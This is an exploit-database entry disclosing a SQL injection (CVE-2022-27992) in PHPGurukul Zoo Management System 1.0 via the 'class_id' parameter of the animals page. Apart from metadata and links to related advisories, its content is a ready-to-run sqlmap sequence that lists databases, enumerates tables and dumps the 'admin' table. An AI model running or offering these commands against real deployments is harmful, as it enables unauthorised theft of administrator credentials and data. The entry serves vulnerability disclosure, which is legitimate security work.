Lucene search
D4rkP0w4r1337DAY-ID-37612HistoryApr 08, 2022 - 12:00 a.m.
PHPGurukul Zoo Management System 1.0 SQL Injection Vulnerability
2022-04-0800:00:00
D4rkP0w4r
0day.today
365
0.002 Low
EPSS
Percentile
56.2%
# Zoo Management System SQL Injection
# Author: D4rkP0w4r
* Description => sql injection at /animals?class_id=1
* Injection Point
http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1
# Exploit
* Exploit with Sqlmap
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -dbs
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -tables -D zoomanagement
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -columns -D zoomanagement -T admin -dump
# Vulnerable Code
* No filter `class_id` when inserting data to database
Related
packetstorm
packetstorm
PHPGurukul Zoo Management System 1.0 SQL Injection
2022-04-08 00:00:00
nvd
nvd
CVE-2022-27992
2022-04-08 09:15:11
cve
cve
CVE-2022-27992
2022-04-08 09:15:11
prion
prion
Sql injection
2022-04-08 09:15:00
cnvd
cnvd
PHPGURUKUL Zoo Management System SQL Injection Vulnerability
2022-04-15 00:00:00
cvelist
cvelist
CVE-2022-27992
2022-04-08 08:23:46